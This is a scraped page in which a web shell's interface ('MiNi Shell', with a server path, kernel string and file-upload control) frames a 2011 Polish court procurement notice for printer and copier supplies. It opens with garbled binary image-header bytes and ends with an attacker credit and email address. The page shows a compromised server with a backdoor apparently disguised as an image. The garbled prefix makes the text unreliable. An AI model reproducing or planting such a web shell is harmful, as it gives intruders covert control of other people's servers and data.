JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111027/355208-N-2011.html

<p class="kh_header"><b>Świdnica: Sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych
do drukarek komputerowych i fotokopiarek dla Sądu Rejonowego w Świdnicy.  Postępowanie nr ZP/2/2011</b><br>
<b>Numer ogłoszenia: 355208 - 2011; data zamieszczenia: 27.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Świdnicy , ul. Okulickiego 2-4, 58-100 Świdnica, woj. dolnośląskie, tel. 74 8518400, faks 74 8518466.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych
do drukarek komputerowych i fotokopiarek dla Sądu Rejonowego w Świdnicy.  Postępowanie nr ZP/2/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest sukcesywna dostawa materiałów eksploatacyjnych do   sprzętu drukującego/fotokopiującego, w asortymencie i ilościach określonych w załączniku nr 1 do SIWZ.
3.2. Zamawiający wymaga dostawy materiałów eksploatacyjnych fabrycznie nowych,   oryginalnych (pochodzących od producenta sprzętu drukującego) lub równoważnych.
3.3.  Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt:
a)	fabrycznie nowy, pochodzący z bieżącej produkcji, wytworzony seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 oraz ISO 14001 lub normami równoważnymi,
b)	opakowany hermetycznie, nie noszący śladów użytkowania,
c)	którego wydajność, zgodnie z normą ISO/IEC 19752 dla kaset z tonerem monochromatycznych, ISO/IEC 19798 dla kaset z tonerem do kolorowych drukarek laserowych, oraz ISO/IEC 24711 dla wkładów drukujących, jest co najmniej taka jak materiału oryginalnego zalecanego przez producentów sprzętu 
d)	który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez producenta sprzętu,
e)	który nie ogranicza pełnej współpracy z programem sprzętu, np. monitorującym stan zasobników z tuszem lub tonerem,
f)	który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej,
g)	w którym wszystkie części są pełnowartościowe, a elementy mające największy wpływ na jakość wydruku, tj. bęben światłoczuły, listwa podająca, listwa zbierająca, wałek magnetyczny są częściami nowymi, w którym zastosowano toner/tusz dopasowany do pracy z danym urządzeniem.
3.4.	W celu potwierdzenia zgodności jakości materiałów równoważnych z odpowiednikami oryginalnymi Wykonawca zobligowany jest złożyć oświadczenie następującej treści: Oświadczam, że oferowany materiał równoważny swoją jakością i wydajnością nie odbiega od oryginalnego materiału pochodzącego od producenta sprzętu drukującego i spełnia wymogi określone w pkt. 3.3 lit. a-g specyfikacji oraz w zakresie wydajności wymogi określone w rub.  E tabeli zawartej w formularzu ofertowym (zał. 1).    
3.5.	 Wszystkie oferowane materiały winny być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kod kreskowy, listą modeli sprzętu, do której jest przeznaczony oraz terminem ważności.
3.6. Zamawiający nie dopuszcza możliwości zaoferowania materiałów eksploatacyjnych napełnionych powtórnie lub skopiowanych w sposób naruszający prawo polskie lub UE.
3.7. Niezależnie od ww. wymagań Zamawiający żąda, aby Wykonawca złożył oświadczenie następującej treści:
Oświadczam, że w przypadku awarii sprzętu z winy dostarczonego materiału eksploatacyjnego zobowiązuję się do naprawy sprzętu w autoryzowanym serwisie lub wymianę urządzenia własnym staraniem i na własny koszt oraz pokrycia w całości szkód jakie awaria ta spowodowała. Wszelkie wymagane ekspertyzy związane z oceną uszkodzonego sprzętu, na skutek kwestionowanych materiałów eksploatacyjnych, wykonam na własny koszt.
3.8.  Wymagania dodatkowe, zgodnie z częścią 7 SIWZ  pkt 7.3 i następne (tj. oświadczenia o których mowa powyżej)
3.9. Wykonawca zobowiązany jest do odbioru wszystkich pojemników po zużytych materiałach eksploatacyjnych stanowiących przedmiot zamówienia  nie później niż 7 dni roboczych od daty zgłoszenia przez Zamawiającego.
3.10 Puste pojemniki po zużytych materiałach, Wykonawca zobowiązany jest poddać utylizacji, zgodnie z wymogami obowiązujących przepisów w tym zakresie. Z tego tytułu Zamawiający nie będzie ponosił żadnych dodatkowych kosztów ani odpowiedzialności.
3.11. Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów odbiega na niekorzyść od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony) lub jeżeli produkt nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, może wypowiedzieć Wykonawcy umowę z powodu niezgodności towaru z ofertą.
3.12. W cenie oferty należy ująć wszystkie czynności wchodzące w skład dostawy oraz transportu zamówionego towaru oraz odbioru zużytych materiałów eksploatacyjnych do/od Zamawiającego oraz ewentualne upusty cenowe.
3.13. Wykonawca udzieli nie mniej niż 12-miesięcznej gwarancji na jakość i żywotność dostarczonych produktów.
3.14. Dostawa realizowana będzie w okresie obowiązywania umowy każdorazowo zgodnie z zamówieniem przesłanym przez Zamawiającego.
3.15. Wykonawca dostarczać będzie określone produkty w terminie do 2 dni roboczych od dnia złożenia przez Zamawiającego zamówienia faksem lub mailowo.  W przypadku zwłoki w realizacji zamówienia, Wykonawca zobowiązany będzie zapłacić Zamawiającemu  karę umowną w wysokości 0,15 % łącznej ceny  brutto wskazanej w formularzu ofertowym (zał. 1)  w  rub. I , za każdy dzień zwłoki. W przypadku zwłoki w realizacji zamówienia dłuższej niż 14 dni, Zamawiający będzie miał prawo odstąpić od umowy i skorzystać z prawa żądania zapłaty kary umownej w wysokości 10% wartości wskazanej jako łączna cena  brutto w formularzu ofertowym  (zał. 1 )  w  rub. I formularza. 
3.16. W zamówieniu zostaną określone w szczególności: rodzaj oraz ilość zamawianego towaru, termin i kwota wynagrodzenia, zgodnie z cenami jednostkowymi określonymi przez Wykonawcę w formularzu cenowym.
3.17. Materiały eksploatacyjne dostarczane będą do siedziby Zamawiającego w Świdnicy przy ul. Okulickiego 2-4, skąd następować będzie także odbiór zużytych materiałów.
3.18. Rozliczenie za wykonanie przedmiotu umowy nastąpi w terminie 21 dni od daty dostarczenia dokumentów księgowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się możliwość zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy, w wysokości do 50 % zamówienia podstawowego dotyczacego przedmiotu zamówienia określonego w specyfikacji, w przypadku gdy z przyczyn obiektywnych nie bedzie możliwe zawarcie nowej umowy na usługi dostawy fabrycznie nowych materiałów eksploatacyjnych do drukarek komputerowych i fotokopiarek w przewidzianym terminie.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.19.21.13-6, 90.50.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni złożyć aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp;
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy z Wykonawców oddzielnie.
Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika zgodnie z art.23 ust.2 ustawy Pzp. Pełnomocnictwo stanowi załącznik do oferty. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych wraz z ofertą oświadczeń o spełnieniu warunku udziału w postępowaniu (zał. 2) i braku podstaw do wykluczenia z postępowania  (zał. 3ai 3b). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na zasadzie : spełnia lub nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni posiadać wiedze i doświadczenie do wykonania zamówienia. Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych wraz z ofertą oświadczeń o spełnieniu warunku udziału w postępowaniu (zał. 2) i braku podstaw do wykluczenia z postępowania  (zał. 3a i 3b). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na zasadzie : spełnia lub nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  winni dysponować odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Wykonawcy powołujący się na potencjał innych podmiotów w zakresie doświadczenia zobowiązani są do wykazania spełnienia warunku poprzez wskazanie części zamówienia, jaką powierzą podwykonawcom.
Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych wraz z ofertą oświadczeń o spełnieniu warunku udziału w postępowaniu (zał. 2) i braku podstaw do wykluczenia z postępowania  (zał. 3a i 3b). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na zasadzie : spełnia lub nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt. 6.1.1 - 6.1.4 winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. Warunek określony w pkt. 6.2 powinien spełniać każdy z Wykonawców samodzielnie. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych wraz z ofertą oświadczeń o spełnieniu warunku udziału w postępowaniu (zał. 2) i braku podstaw do wykluczenia z postępowania  (zał. 3a i 3b). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na zasadzie : spełnia lub nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy znajdujący się w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia.
Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych wraz z ofertą oświadczeń o spełnieniu warunku udziału w postępowaniu (zał. 2) i braku podstaw do wykluczenia z postępowania  (zał. 3a i 3b). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na zasadzie : spełnia lub nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że oferowany materiał równoważny swoją jakością i wydajnością nie odbiega od oryginalnego materiału pochodzącego od producenta sprzętu drukującego i spełnia wymogi określone w pkt. 3.3 lit. a-g specyfikacji oraz w zakresie wydajności wymogi określone w rub.  E tabeli zawartej w formularzu ofertowym  (zał. 1) 
Oświadczanie, że w przypadku awarii sprzętu z winy dostarczonego materiału eksploatacyjnego Wykonawca zobowiązuję się do naprawy sprzętu w autoryzowanym serwisie lub wymianę urządzenia własnym staraniem i na własny koszt oraz pokrycia w całości szkód jakie awaria ta spowodowała. Wszelkie wymagane ekspertyzy związane z oceną uszkodzonego sprzętu, na skutek kwestionowanych materiałów eksploatacyjnych, Wykonawca wykona na własny koszt.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Razem z ofertą należy przedłożyć:
a)   oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu wg załączonego wzoru (zał. nr 2);
b)   oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp (zał. nr 3a lub 3b);
c)    aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w stepowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp;
d)    dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, umowa spółki cywilnej. Wymagane dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez Wykonawcę;
e)   jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa w lit. d, do oferty należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie;
W przypadku zaoferowania materiałów równoważnych:
f)       oświadczenie o którym mowa w części 3 SIWZ pkt 3.4.
h)      oświadczenia o którym mowa w części 3 SIWZ pkt 3.7.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy na wniosek Wykonawczy dopuszcza możliwość zmiany wynagrodzenia brutto umowy na skutek urzędowej zmiany stawek podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Świdnicy, ul. Okulickiego 2-4, 58-100 Świdnica, pok. 110, tel. (047) 85-18-467, 85- 18- 452, fax (o74) 85- 18- 466,  mail: srs@swidnica.sr.gov.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2011 godzina 09:00, miejsce: Sąd Rejonowy w Świdnicy, ul. Okulickiego 2-4, 58-100 Świdnica, pok. 110 (parter), Sekcja Finansowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com